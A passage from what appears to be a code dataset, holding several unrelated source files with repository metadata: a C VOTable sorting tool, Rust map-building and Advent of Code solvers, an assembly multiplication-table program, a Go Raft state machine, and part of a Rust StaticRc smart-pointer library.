if (iname == NULL) iname = strdup ("stdin");
if (oname == NULL) oname = strdup ("stdout");
if (strcmp (iname, "-") == 0) { free (iname), iname = strdup ("stdin"); }
if (strcmp (oname, "-") == 0) { free (oname), oname = strdup ("stdout"); }
fmt = (fmt ? fmt : strdup ("xml"));
/* Open the table. This also parses it.
*/
if ( (vot = vot_openVOTABLE (iname) ) <= 0) {
fprintf (stderr, "Error opening VOTable '%s'\n", iname);
return (1);
}
res = vot_getRESOURCE (vot); /* get handles */
if (vot_getLength (res) > 1) {
fprintf (stderr, "Error: multiple RESOURCE elements not supported\n");
goto clean_up_;
}
if ((tab = vot_getTABLE (res)) <= 0)
goto clean_up_;
if ((data = vot_getDATA (tab)))
tdata = vot_getTABLEDATA (data);
else
goto clean_up_;
/* Find the requested sort column. If the column isn't set explicitly
* check each field for the name/id/ucd.
*/
if (col < 0) {
char *name, *id, *ucd;
handle_t field;
for (field=vot_getFIELD(tab); field; field=vot_getNext(field),i++) {
id = vot_getAttr (field, "id");
name = vot_getAttr (field, "name");
ucd = vot_getAttr (field, "ucd");
/* See whether this is a column we can sort numerically.
*/
if (! do_string)
scalar = vot_isNumericField (field);
if ((byName && name && strcasecmp (name, byName) == 0) ||
(byID && id && strcasecmp (id, byID) == 0) ||
(byUCD && ucd && strcasecmp (ucd, byUCD) == 0)) {
col = i, do_string = (do_string ? 1 : ! scalar);
break;
}
}
} else {
register int i = 0;
for (field = vot_getFIELD(tab); field && i < col; i++)
field = vot_getNext(field);
if (! do_string)
scalar = vot_isNumericField (field);
do_string = (do_string ? 1 : ! scalar);
}
/* Sort the table.
*/
(void) vot_sortTable (tdata, (col < 0 ? 0 : col), do_string, sort_order);
/* Now trim the data rows if we've set a TOP condition.
*/
if (top) {
int row = 0, ntr = 0;
/* Skip over the rows we'll keep
*/
for (tr=vot_getTR (tdata); tr && row < top; tr=vot_getNext(tr))
row++;
/* Free the remaining rows.
*/
for ( ; tr; tr = ntr) {
ntr=vot_getNext(tr);
vot_deleteNode (tr);
}
}
/* Output the new format.
*/
memset (format, 0, SZ_FORMAT);
switch (strdic (fmt, format, SZ_FORMAT, FORMATS)) {
case VOT: vot_writeVOTable (vot, oname, indent); break;
case ASV: vot_writeASV (vot, oname, hdr); break;
case BSV: vot_writeBSV (vot, oname, hdr); break;
case CSV: vot_writeCSV (vot, oname, hdr); break;
case TSV: vot_writeTSV (vot, oname, hdr); break;
case HTML: vot_writeHTML (vot, iname, oname); break;
case SHTML: vot_writeSHTML (vot, iname, oname); break;
case FITS: vot_writeFITS (vot, oname); break;
case ASCII: vot_writeASV (vot, oname, hdr); break;
case XML: vot_writeVOTable (vot, oname, indent); break;
case RAW: vot_writeVOTable (vot, oname, indent); break;
default:
fprintf (stderr, "Unknown output format '%s'\n", fmt);
status = ERR;
}
/* Clean up. Rememebr to free whatever pointers were created when
* parsing arguments.
*/
clean_up_:
if (iname) free (iname);
if (oname) free (oname);
if (fmt) free (fmt);
if (byID) free (byID);
if (byUCD) free (byUCD);
if (byName) free (byName);
vo_paramFree (argc, pargv);
vot_closeVOTABLE (vot);
return (status); /* status must be OK or ERR (i.e. 0 or 1) */
}
/**
* USAGE -- Print task help summary.
*/
static void
Usage (void)
{
fprintf (stderr, "\n Usage:\n\t"
"votsort [<opts>] votable.xml\n\n"
" Where\n"
" -c,--col <N> Sort column num\n"
" -d,--desc Sort in descending order\n"
" -f,--fmt <format> Output format\n"
" -o,--output <name> Output name\n"
" -s,--string String sort\n"
" -t,--top <N> Print top <N> rows\n"
" -i,--indent <N> XML indent level\n"
" -n,--noheader Suppress header\n"
" -N,--name <name> Find <name> column\n"
" -I,--id <id> Find <id> column\n"
" -U,--ucd <ucd> Find <ucd> column\n"
"\n"
" -h,--help This message\n"
" -r,--return Return result\n"
" -%%,--test Run unit tests\n"
"\n"
" <format> is one of\n"
" vot A new VOTable\n"
" asv ascii separated values\n"
" bsv bar separated values\n"
" csv comma separated values\n"
" tsv tab separated values\n"
" html standalone HTML document\n"
" shtml single HTML <table>\n"
" fits FITS binary table\n"
" ascii ASV alias\n"
" xml VOTable alias\n"
" raw VOTable alias\n"
"\n"
"\n"
" Examples:\n\n"
" 1) Sort a VOTable based on first column\n\n"
" %% votsort test.xml\n"
" %% votsort http://generic.edu/test.xml\n"
" %% cat test.xml | votsort -o sort_test.xml\n"
"\n"
" A string sort will be done automatically if this is a\n"
" string-valued column, otherwise a numeric sort is done.\n"
"\n"
" 2) Sort a VOTable based on the magnitude column\n\n"
" %% votsort --name=id test.xml\n"
"\n"
" 3) Same as above, select 10 faintest stars\n\n"
" %% votsort --name=id --desc --top=10 test.xml\n"
"\n"
" 4) String sort based on object name, output as CSV\n\n"
" %% votsort -s -f csv test.xml\n"
" %% votsort --string --fmt=csv test.xml\n"
"\n"
);
}
/**
* Tests -- Task unit tests.
*/
static void
Tests (char *input)
{
Task *task = &self;
vo_taskTest (task, "--help", NULL);
vo_taskTest (task, input, NULL); // Ex 1
vo_taskTest (task, "http://iraf.noao.edu/votest/sort.xml", NULL); // Ex 2
vo_taskTest (task, "--name=id", input, NULL); // Ex 3
vo_taskTest (task, "--name=id", "--desc", "--top=10", input, NULL); // Ex 4
vo_taskTest (task, "-s", "-f", "csv", input, NULL); // Ex 5
vo_taskTest (task, "--string", "--fmt=csv", input, NULL); // Ex 6
vo_taskTest (task, "--name=id", "-s", "--desc", "--fmt=csv", input, NULL);
vo_taskTestReport (self);
}
| 32.060759 | 79 | 0.540272 | 3.015625 |
ebab59acb824a2e93706e47c007e30c94a6b53ba | 4,898 | rs | Rust | map_model/src/make/buildings.rs | omalaspinas/abstreet | 43b31dcdbc6b7a599eceab3a17fa4e1fab72b691 | [
"Apache-2.0"
] | 2 | 2020-03-31T22:48:17.000Z | 2020-05-19T08:02:22.000Z | map_model/src/make/buildings.rs | omalaspinas/abstreet | 43b31dcdbc6b7a599eceab3a17fa4e1fab72b691 | [
"Apache-2.0"
] | null | null | null | map_model/src/make/buildings.rs | omalaspinas/abstreet | 43b31dcdbc6b7a599eceab3a17fa4e1fab72b691 | [
"Apache-2.0"
] | null | null | null | use crate::make::sidewalk_finder::find_sidewalk_points;
use crate::raw::{OriginalBuilding, RawBuilding};
use crate::{osm, Building, BuildingID, FrontPath, LaneID, LaneType, Map, OffstreetParking};
use abstutil::Timer;
use geom::{Distance, HashablePt2D, Line, PolyLine, Polygon};
use std::collections::{BTreeMap, HashSet};
pub fn make_all_buildings(
input: &BTreeMap<OriginalBuilding, RawBuilding>,
map: &Map,
timer: &mut Timer,
) -> Vec<Building> {
timer.start("convert buildings");
let mut center_per_bldg: BTreeMap<OriginalBuilding, HashablePt2D> = BTreeMap::new();
let mut query: HashSet<HashablePt2D> = HashSet::new();
timer.start_iter("get building center points", input.len());
for (id, b) in input {
timer.next();
let center = b.polygon.center().to_hashable();
center_per_bldg.insert(*id, center);
query.insert(center);
}
// Skip buildings that're too far away from their sidewalk
let sidewalk_pts = find_sidewalk_points(
map.get_bounds(),
query,
map.all_lanes(),
Distance::meters(100.0),
timer,
);
let mut results = Vec::new();
timer.start_iter("create building front paths", center_per_bldg.len());
for (orig_id, bldg_center) in center_per_bldg {
timer.next();
if let Some(sidewalk_pos) = sidewalk_pts.get(&bldg_center) {
let sidewalk_pt = sidewalk_pos.pt(map);
if sidewalk_pt == bldg_center.to_pt2d() {
timer.warn(format!(
"Skipping building {} because front path has 0 length",
orig_id
));
continue;
}
let b = &input[&orig_id];
let sidewalk_line =
trim_path(&b.polygon, Line::new(bldg_center.to_pt2d(), sidewalk_pt));
let id = BuildingID(results.len());
let mut bldg = Building {
id,
polygon: b.polygon.clone(),
address: get_address(&b.osm_tags, sidewalk_pos.lane(), map),
name: b.osm_tags.get(osm::NAME).cloned(),
osm_way_id: orig_id.osm_way_id,
front_path: FrontPath {
sidewalk: *sidewalk_pos,
line: sidewalk_line.clone(),
},
amenities: b.amenities.clone(),
parking: None,
label_center: b.polygon.polylabel(),
};
// Can this building have a driveway? If it's not next to a driving lane, then no.
let sidewalk_lane = sidewalk_pos.lane();
if let Ok(driving_lane) = map
.get_parent(sidewalk_lane)
.find_closest_lane(sidewalk_lane, vec![LaneType::Driving])
{
let driving_pos = sidewalk_pos.equiv_pos(driving_lane, Distance::ZERO, map);
let buffer = Distance::meters(7.0);
if driving_pos.dist_along() > buffer
&& map.get_l(driving_lane).length() - driving_pos.dist_along() > buffer
{
let driveway_line = PolyLine::new(vec![
sidewalk_line.pt1(),
sidewalk_line.pt2(),
driving_pos.pt(map),
]);
bldg.parking = Some(OffstreetParking {
public_garage_name: b.public_garage_name.clone(),
num_spots: b.num_parking_spots,
driveway_line,
driving_pos,
});
}
}
if bldg.parking.is_none() {
timer.warn(format!(
"{} can't have a driveway. Forfeiting {} parking spots",
bldg.id, b.num_parking_spots
));
}
results.push(bldg);
}
}
timer.note(format!(
"Discarded {} buildings that weren't close enough to a sidewalk",
input.len() - results.len()
));
timer.stop("convert buildings");
results
}
// Adjust the path to start on the building's border, not center
fn trim_path(poly: &Polygon, path: Line) -> Line {
for bldg_line in poly.points().windows(2) {
let l = Line::new(bldg_line[0], bldg_line[1]);
if let Some(hit) = l.intersection(&path) {
if let Some(l) = Line::maybe_new(hit, path.pt2()) {
return l;
}
}
}
// Just give up
path
}
fn get_address(tags: &BTreeMap<String, String>, sidewalk: LaneID, map: &Map) -> String {
match (tags.get("addr:housenumber"), tags.get("addr:street")) {
(Some(num), Some(st)) => format!("{} {}", num, st),
(None, Some(st)) => format!("??? {}", st),
_ => format!("??? {}", map.get_parent(sidewalk).get_name()),
}
}
| 37.106061 | 94 | 0.538587 | 3.0625 |
cae68b4d01dd94e0377b78e6e858beab62052611 | 2,080 | asm | Assembly | sources/mul_tab.asm | matteosev/mul_tab | e6571eb465ca87198acf17be8f807695244d7dea | [
"MIT"
] | 1 | 2020-04-19T07:14:37.000Z | 2020-04-19T07:14:37.000Z | sources/mul_tab.asm | matteosev/mul_tab | e6571eb465ca87198acf17be8f807695244d7dea | [
"MIT"
] | null | null | null | sources/mul_tab.asm | matteosev/mul_tab | e6571eb465ca87198acf17be8f807695244d7dea | [
"MIT"
] | null | null | null | ; args:
; 1: the table to display
; displays the multiplication table
%include "module.asm"
section .data
x db " x ", 0
equal db " = ", 0
nl db 10 ; ascii code for new line
msg db "Please enter an integer between 0 and 9 or a letter.", 10, 0
section .bss
op1 resq 1
op2 resq 1
res resq 1
temp resq 1
section .text
global _start
_start:
main:
; get args
pop rax ; pop nb args
cmp rax, 1 ; there's 1 argument by default : the path to the binarie
je wrong_arg ; if only 1 arg, it means user forgot to enter his arg
times 2 pop rax ; pop path, 1st user arg
mov al, byte [rax] ; get 1 char (because rax currently is a pointer)
; initialize the two operands with chars representing integer
mov qword [op1], rax
mov qword [op2], "0"
mov rcx, 10 ; loop counter
; main loop
loop_mul:
push rcx ; save counter state
; cast to int to calculate
str_to_int op1, 1
str_to_int op2, 1
; calculations
inc byte [op2] ; increment 2nd operand
mov al, byte [op2] ; move 2nd operand in al for multiplication
mul byte [op1] ; mul al (op2) by op1 to get result
mov qword [res], rax ; put result in res
; cast to str to display
int_to_str op1, temp
int_to_str op2, temp
int_to_str res, temp
; display
print op1, 1
print x, 0
print op2, 2
print equal, 0
print res, 3
print nl, 1
; verifie that we are still in the range we target
pop rcx ; reset counter
dec rcx ; decrement counter
jnz loop_mul ; if counter != 0, continue looping
jmp end ; else finish program
wrong_arg:
print msg, 0
end:
exit | 27.733333 | 93 | 0.513942 | 3.484375 |
dd6032ac0651900ceecf67e713af0bbc22928a18 | 2,792 | go | Go | store/fsm.go | makersu/go-raft-kafka | 02d37c3ce6e6cac5738165fad6b91638c913c01c | [
"MIT"
] | null | null | null | store/fsm.go | makersu/go-raft-kafka | 02d37c3ce6e6cac5738165fad6b91638c913c01c | [
"MIT"
] | null | null | null | store/fsm.go | makersu/go-raft-kafka | 02d37c3ce6e6cac5738165fad6b91638c913c01c | [
"MIT"
] | null | null | null | package store
/**
// FSM provides an interface that can be implemented by
// clients to make use of the replicated log.
type FSM interface {
// Apply log is invoked once a log entry is committed.
// It returns a value which will be made available in the
// ApplyFuture returned by Raft.Apply method if that
// method was called on the same Raft node as the FSM.
Apply(*Log) interface{}
// Snapshot is used to support log compaction. This call should
// return an FSMSnapshot which can be used to save a point-in-time
// snapshot of the FSM. Apply and Snapshot are not called in multiple
// threads, but Apply will be called concurrently with Persist. This means
// the FSM should be implemented in a fashion that allows for concurrent
// updates while a snapshot is happening.
Snapshot() (FSMSnapshot, error)
// Restore is used to restore an FSM from a snapshot. It is not called
// concurrently with any other command. The FSM must discard all previous
// state.
Restore(io.ReadCloser) error
}
**/
import (
"encoding/json"
"fmt"
"io"
"log"
"os"
"sync"
"github.com/hashicorp/raft"
)
type command struct {
Op string `json:"op,omitempty"`
Key string `json:"key,omitempty"`
Value string `json:"value,omitempty"`
}
// Node State Machine
type NodeFSM struct {
// db DB
mutex sync.Mutex
m map[string]string // The key-value store for the system.
logger *log.Logger
}
func NewNodeFSM() *NodeFSM {
return &NodeFSM{
logger: log.New(os.Stderr, "[fsm] ", log.LstdFlags),
}
}
// Apply applies a Raft log entry to the key-value store.
func (fsm *NodeFSM) Apply(l *raft.Log) interface{} {
var c command
if err := json.Unmarshal(l.Data, &c); err != nil {
panic(fmt.Sprintf("failed to unmarshal command: %s", err.Error()))
}
// fsm.logger.Println("c", c)
switch c.Op {
case "set":
return fsm.applySet(c.Key, c.Value)
// case "delete":
// return f.applyDelete(c.Key)
default:
panic(fmt.Sprintf("unrecognized command op: %s", c.Op))
}
}
func (fsm *NodeFSM) applySet(key, value string) interface{} {
fsm.logger.Printf("apply %s to %s\n", key, value)
fsm.mutex.Lock()
defer fsm.mutex.Unlock()
fsm.m[key] = value
return nil
}
// Snapshot returns a snapshot of the key-value store.
func (f *NodeFSM) Snapshot() (raft.FSMSnapshot, error) {
f.mutex.Lock()
defer f.mutex.Unlock()
// Clone the map.
o := make(map[string]string)
for k, v := range f.m {
o[k] = v
}
return &fsmSnapshot{store: o}, nil
}
// Restore stores the key-value store to a previous state.
func (f *NodeFSM) Restore(rc io.ReadCloser) error {
o := make(map[string]string)
if err := json.NewDecoder(rc).Decode(&o); err != nil {
return err
}
// Set the state from the snapshot, no lock required according to
// Hashicorp docs.
f.m = o
return nil
}
| 24.491228 | 75 | 0.690186 | 3.09375 |
be4a207ee408e3ed6964c176e53c02fa322f5df5 | 4,927 | rs | Rust | 2019/day14/src/main.rs | dcoles/advent-of-code | 4d480934daad60fcdb2112ef66f4115d9cb83ac2 | [
"MIT"
] | 2 | 2021-12-01T06:47:00.000Z | 2021-12-02T20:09:40.000Z | 2019/day14/src/main.rs | dcoles/advent-of-code | 4d480934daad60fcdb2112ef66f4115d9cb83ac2 | [
"MIT"
] | null | null | null | 2019/day14/src/main.rs | dcoles/advent-of-code | 4d480934daad60fcdb2112ef66f4115d9cb83ac2 | [
"MIT"
] | null | null | null | use std::{fs, fmt};
use std::path::Path;
use std::collections::{HashMap, VecDeque};
type Chemical = String;
const ORE: &str = "ORE";
const FUEL: &str = "FUEL";
const TRILLION: u64 = 1_000_000_000_000;
fn main() {
let input = read_input("input.txt");
// Part 1
assert_eq!(31, required_ore(&read_input("sample1.txt"), 1));
assert_eq!(165, required_ore(&read_input("sample2.txt"), 1));
assert_eq!(13312, required_ore(&read_input("sample3.txt"), 1));
assert_eq!(180697, required_ore(&read_input("sample4.txt"), 1));
assert_eq!(2210736, required_ore(&read_input("sample5.txt"), 1));
println!("Part 1: Required ore: {}", required_ore(&input, 1));
// Part 2
assert_eq!(82892753, maximum_fuel(&read_input("sample3.txt"), TRILLION));
assert_eq!(5586022, maximum_fuel(&read_input("sample4.txt"), TRILLION));
assert_eq!(460664, maximum_fuel(&read_input("sample5.txt"), TRILLION));
println!("Part 2: Maximum fuel: {}", maximum_fuel(&input, TRILLION));
}
/// Find the amount of ore required for n-units of fuel
fn required_ore(reactions: &[Reaction], fuel: u64) -> u64 {
let reactant_map = build_reactant_map(reactions);
let mut required_ore = 0;
// Queue of required chemicals
let mut requirements = VecDeque::new();
requirements.push_back((FUEL, fuel));
// Surplus from previous reactions
let mut chemical_surplus = HashMap::new();
// Run required reactions
while let Some((chemical, mut quantity)) = requirements.pop_front() {
if chemical == ORE {
required_ore += quantity;
} else {
// Can we use some surplus?
if let Some(&surplus) = chemical_surplus.get(chemical) {
let consumed = quantity.min(surplus);
chemical_surplus.insert(chemical, surplus - consumed);
quantity -= consumed;
// No need to run if we have enough surplus
if quantity == 0 {
continue;
}
}
// How many times do we need to run a reaction?
let reaction = &reactant_map[chemical];
let n_reactions = (quantity - 1) / reaction.quantity + 1;
// How much reactants do we need?
for (chem, &n) in &reaction.reactants {
let amount = n * n_reactions;
requirements.push_back((chem, amount));
}
// Collect surplus
let surplus = reaction.quantity * n_reactions - quantity;
*chemical_surplus.entry(chemical).or_default() += surplus;
}
}
required_ore
}
/// Find the maximum amount of fuel a fixed amount of ore can produce
fn maximum_fuel(reactions: &[Reaction], ore: u64) -> u64 {
let mut fuel = 0;
// Do an exponential search for the required fuel
loop {
let mut n = 0;
while required_ore(reactions, fuel + 2u64.pow(n)) < ore {
n += 1;
}
if n > 0 {
fuel += 2u64.pow(n - 1);
} else {
// Found the maximum
break;
}
}
fuel
}
fn read_input<T: AsRef<Path>>(path: T) -> Vec<Reaction> {
let contents = fs::read_to_string(path).expect("Failed to read input");
let mut reactions = Vec::new();
for line in contents.lines() {
let line: Vec<_> = line.split("=>").collect();
let reactants = parse_chemical_list(&line[0]);
let product_quantity = parse_chemical(&line[1]);
reactions.push(Reaction { reactants, product: product_quantity.0, quantity: product_quantity.1 })
}
reactions
}
/// Parse a list of chemicals quantities, `N CHEMICAL, ...`
fn parse_chemical_list(list: &str) -> HashMap<Chemical, u64> {
let mut result = HashMap::new();
for (c, n) in list.split(',').map(|value| parse_chemical(value)) {
result.insert(c, n);
}
result
}
/// Parse a single chemical quantity, `N CHEMICAL`
fn parse_chemical(value: &str) -> (Chemical, u64) {
let value: Vec<_> = value.trim().split(' ').collect();
let n: u64 = value[0].parse().expect("Failed to parse quantity");
(value[1].to_owned(), n)
}
/// Build a mapping from Chemical to its associated reaction
fn build_reactant_map(reactions: &[Reaction]) -> HashMap<Chemical, &Reaction> {
let mut map = HashMap::new();
for reaction in reactions {
let chemical = reaction.product.to_owned();
map.insert(chemical, reaction);
}
map
}
/// A chemical reaction
#[derive(Debug)]
struct Reaction {
reactants: HashMap<Chemical, u64>,
product: Chemical,
quantity: u64,
}
impl fmt::Display for Reaction {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let inputs = self.reactants.iter().map(|(c, &n)| format!("{} {}", n, c)).collect::<Vec<_>>().join(", ");
write!(f, "{} => {} {}", inputs, self.quantity, self.product)
}
}
| 30.79375 | 112 | 0.598742 | 3.078125 |
647f84865144aee13674b2cb43fb862bb0ee7c4f | 17,985 | rs | Rust | src/static_rc.rs | Johannesd3/static-rc | 48e883e2f5d89a3177ef31f4773ab7252b614a9d | [
"Apache-2.0",
"MIT"
] | null | null | null | src/static_rc.rs | Johannesd3/static-rc | 48e883e2f5d89a3177ef31f4773ab7252b614a9d | [
"Apache-2.0",
"MIT"
] | null | null | null | src/static_rc.rs | Johannesd3/static-rc | 48e883e2f5d89a3177ef31f4773ab7252b614a9d | [
"Apache-2.0",
"MIT"
] | null | null | null | // StaticRc
use core::{
any,
borrow,
cmp,
convert,
fmt,
future,
hash,
iter,
marker,
mem,
ops,
pin,
ptr::{self, NonNull},
task,
};
use alloc::boxed::Box;
#[cfg(nightly_async_stream)]
use core::stream;
/// A compile-time reference-counted pointer.
///
/// The inherent methods of `StaticRc` are all associated functions to avoid conflicts with the the methods of the
/// inner type `T` which are brought into scope by the `Deref` implementation.
///
/// The parameters `NUM` and `DEN` DENote the ratio (`NUM / DEN`) of ownership of the pointer:
///
/// - The ratio is always in the (0, 1] interval, that is: `NUM > 0` and `NUM <= DEN`.
/// - When the ratio is equal to 1, that is when `NUM == DEN`, then the instance has full ownership of the pointee
/// and extra capabilities are unlocked.
pub struct StaticRc<T: ?Sized, const NUM: usize, const DEN: usize> {
pointer: NonNull<T>,
}
impl<T, const N: usize> StaticRc<T, N, N> {
/// Constructs a new `StaticRc<T, N, N>`.
///
/// This uses `Box` under the hood.
#[inline(always)]
pub fn new(value: T) -> Self {
let pointer = NonNull::from(Box::leak(Box::new(value)));
Self { pointer }
}
/// Constructs a new `Pin<StaticRc<T, N, N>>`.
#[inline(always)]
pub fn pin(value: T) -> pin::Pin<Self> {
// Safety:
// - The `value` is placed on the heap, and cannot be moved out of the heap without full ownership.
unsafe { pin::Pin::new_unchecked(Self::new(value)) }
}
/// Returns the inner value.
#[inline(always)]
pub fn into_inner(this: Self) -> T {
// Safety:
// - Ratio = 1, hence full ownership.
let value = unsafe { ptr::read(this.pointer.as_ptr()) };
mem::forget(this);
value
}
}
impl<T: ?Sized, const N: usize> StaticRc<T, N, N> {
/// Returns a mutable reference into the given `StaticRc`.
#[inline(always)]
pub fn get_mut(this: &mut Self) -> &mut T {
// Safety:
// - Ratio = 1, hence full ownership.
unsafe { this.pointer.as_mut() }
}
/// Returns the inner value, boxed
#[inline(always)]
pub fn into_box(this: Self) -> Box<T> {
// Safety:
// - Ratio = 1, hence full ownership.
// - `this.pointer` was allocated by Box.
unsafe { Box::from_raw(this.pointer.as_ptr()) }
}
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> StaticRc<T, NUM, DEN> {
/// Consumes the `StaticRc`, returning the wrapped pointer.
///
/// To avoid a memory leak, the pointer must be converted back to `Self` using `StaticRc::from_raw`.
#[inline(always)]
pub fn into_raw(this: Self) -> NonNull<T> { this.pointer }
/// Provides a raw pointer to the data.
///
/// `StaticRc` is not consumed or affected in any way, the pointer is valid as long as there are shared owners of
/// the value.
#[inline(always)]
pub fn as_ptr(this: &Self) -> NonNull<T> { this.pointer }
/// Provides a reference to the data.
#[inline(always)]
pub fn get_ref(this: &Self) -> &T {
// Safety:
// - The data is valid for as long as `this` lives.
unsafe { this.pointer.as_ref() }
}
/// Constructs a `StaticRc<T, NUM, DEN>` from a raw pointer.
///
/// The raw pointer must have been previously returned by a call to `StaticRc<U, N, D>::into_raw`:
///
/// - If `U` is different from `T`, then specific restrictions on size and alignment apply. See `mem::transmute`
/// for the restrictions applying to transmuting references.
/// - If `N / D` is different from `NUM / DEN`, then specific restrictions apply. The user is responsible for
/// ensuring proper management of the ratio of shares, and ultimately that the value is not dropped twice.
#[inline(always)]
pub unsafe fn from_raw(pointer: NonNull<T>) -> Self { Self { pointer } }
/// Returns true if the two `StaticRc` point to the same allocation.
#[inline(always)]
pub fn ptr_eq<const N: usize, const D: usize>(this: &Self, other: &StaticRc<T, N, D>) -> bool {
StaticRc::as_ptr(this) == StaticRc::as_ptr(other)
}
/// Adjusts the NUMerator and DENUMerator of the ratio of the instance, preserving the ratio.
#[inline(always)]
pub fn adjust<const N: usize, const D: usize>(this: Self) -> StaticRc<T, N, D> {
// Check that NUM / DEN == N / D <=> NUM * D == N * DEN
#[cfg(compile_time_ratio)]
{
let _ : [u8; NUM * D - N * DEN];
let _ : [u8; N * DEN - NUM * D];
}
#[cfg(not(compile_time_ratio))]
assert_eq!(NUM * D, N * DEN, "{} / {} != {} / {}", NUM, DEN, N, D);
let pointer = this.pointer;
mem::forget(this);
StaticRc { pointer }
}
/// Splits the current instance into two instances with the specified NUMerators.
#[inline(always)]
pub fn split<const A: usize, const B: usize>(this: Self) -> (StaticRc<T, A, DEN>, StaticRc<T, B, DEN>) {
// Check that (A + B) == NUM.
#[cfg(compile_time_ratio)]
{
let _ : [u8; (A + B) - NUM];
let _ : [u8; NUM - (A + B)];
}
#[cfg(not(compile_time_ratio))]
assert_eq!(NUM, A + B, "{} != {} + {}", NUM, A, B);
let pointer = this.pointer;
mem::forget(this);
(StaticRc { pointer }, StaticRc { pointer })
}
/// Joins two instances into a single instance.
///
/// # Panics
///
/// If the two instances do no point to the same allocation, as determined by `StaticRc::ptr_eq`.
#[inline(always)]
pub fn join<const A: usize, const B: usize>(left: StaticRc<T, A, DEN>, right: StaticRc<T, B, DEN>) -> Self {
// Check that (A + B) == NUM.
#[cfg(compile_time_ratio)]
{
let _ : [u8; (A + B) - NUM];
let _ : [u8; NUM - (A + B)];
}
#[cfg(not(compile_time_ratio))]
assert_eq!(NUM, A + B, "{} != {} + {}", NUM, A, B);
assert!(StaticRc::ptr_eq(&left, &right), "{:?} != {:?}", left.pointer.as_ptr(), right.pointer.as_ptr());
let pointer = left.pointer;
mem::forget(left);
mem::forget(right);
Self { pointer }
}
}
impl<const NUM: usize, const DEN: usize> StaticRc<dyn any::Any, NUM, DEN> {
/// Attempts to downcast `Self` to a concrete type.
pub fn downcast<T: any::Any>(self) -> Result<StaticRc<T, NUM, DEN>, Self> {
if Self::get_ref(&self).is::<T>() {
let pointer = Self::into_raw(self).cast::<T>();
Ok(StaticRc { pointer })
} else {
Err(self)
}
}
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> Drop for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn drop(&mut self) {
// Check that NUM == DEN.
#[cfg(compile_time_ratio)]
{
let _ : [u8; DEN - NUM];
let _ : [u8; NUM - DEN];
}
#[cfg(not(compile_time_ratio))]
debug_assert_eq!(NUM, DEN, "{} != {}", NUM, DEN);
if NUM == DEN {
// Safety:
// - Ratio = 1, hence full ownership.
// - `self.pointer` was allocated by Box.
unsafe { Box::from_raw(self.pointer.as_ptr()) };
}
}
}
impl<T: ?Sized, const N: usize> convert::AsMut<T> for StaticRc<T, N, N> {
#[inline(always)]
fn as_mut(&mut self) -> &mut T { Self::get_mut(self) }
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> convert::AsRef<T> for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn as_ref(&self) -> &T { Self::get_ref(self) }
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> borrow::Borrow<T> for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn borrow(&self) -> &T { Self::get_ref(self) }
}
impl<T: ?Sized, const N: usize> borrow::BorrowMut<T> for StaticRc<T, N, N> {
#[inline(always)]
fn borrow_mut(&mut self) -> &mut T { Self::get_mut(self) }
}
#[cfg(nightly_coerce_unsized)]
impl<T, U, const NUM: usize, const DEN: usize> CoerceUnsized<StaticRc<U, NUM, DEN>> for StaticRc<T, NUM, DEN>
where
T: ?Sized + marker::Unsize<U>,
U: ?Sized,
{}
impl<T: ?Sized + fmt::Debug, const NUM: usize, const DEN: usize> fmt::Debug for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> Result<(), fmt::Error> {
fmt::Debug::fmt(Self::get_ref(self), f)
}
}
impl<T: Default, const N: usize> Default for StaticRc<T, N, N> {
#[inline(always)]
fn default() -> Self { Self::new(T::default()) }
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> ops::Deref for StaticRc<T, NUM, DEN> {
type Target = T;
#[inline(always)]
fn deref(&self) -> &T { Self::get_ref(self) }
}
impl<T: ?Sized, const N: usize> ops::DerefMut for StaticRc<T, N, N> {
#[inline(always)]
fn deref_mut(&mut self) -> &mut T { Self::get_mut(self) }
}
impl<T: ?Sized + fmt::Display, const NUM: usize, const DEN: usize> fmt::Display for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> Result<(), fmt::Error> {
fmt::Display::fmt(Self::get_ref(self), f)
}
}
#[cfg(nightly_dispatch_from_dyn)]
impl<T, U, const NUM: usize, const DEN: usize> DispatchFromDyn<StaticRc<U, NUM, DEN>> for StaticRc<T, NUM, DEN>
where
T: ?Sized + marker::Unsize<U>,
U: ?Sized,
{}
impl<I: iter::DoubleEndedIterator + ?Sized, const N: usize> iter::DoubleEndedIterator for StaticRc<I, N, N> {
#[inline(always)]
fn next_back(&mut self) -> Option<I::Item> { Self::get_mut(self).next_back() }
#[inline(always)]
fn nth_back(&mut self, n: usize) -> Option<I::Item> { Self::get_mut(self).nth_back(n) }
}
impl<T: ?Sized + cmp::Eq, const NUM: usize, const DEN: usize> cmp::Eq for StaticRc<T, NUM, DEN> {}
impl<I: iter::ExactSizeIterator + ?Sized, const N: usize> iter::ExactSizeIterator for StaticRc<I, N, N> {
#[inline(always)]
fn len(&self) -> usize { Self::get_ref(self).len() }
}
impl<T: ?Sized, const N: usize> From<Box<T>> for StaticRc<T, N, N> {
#[inline(always)]
fn from(value: Box<T>) -> Self {
let pointer = NonNull::from(Box::leak(value));
Self { pointer }
}
}
impl<T: Copy, const N: usize> From<&'_ [T]> for StaticRc<[T], N, N> {
#[inline(always)]
fn from(value: &[T]) -> Self { Self::from(Box::from(value)) }
}
impl<const N: usize> From<&'_ str> for StaticRc<str, N, N> {
#[inline(always)]
fn from(value: &str) -> Self { Self::from(Box::from(value)) }
}
impl<T, const LEN: usize, const N: usize> From<[T; LEN]> for StaticRc<[T], N, N> {
#[inline(always)]
fn from(value: [T; LEN]) -> Self { Self::from(Box::from(value)) }
}
impl<T: Copy, const N: usize> From<alloc::borrow::Cow<'_, [T]>> for StaticRc<[T], N, N> {
#[inline(always)]
fn from(value: alloc::borrow::Cow<'_, [T]>) -> Self { Self::from(Box::from(value)) }
}
impl<const N: usize> From<alloc::borrow::Cow<'_, str>> for StaticRc<str, N, N> {
#[inline(always)]
fn from(value: alloc::borrow::Cow<'_, str>) -> Self { Self::from(Box::from(value)) }
}
impl<const N: usize> From<alloc::string::String> for StaticRc<str, N, N> {
#[inline(always)]
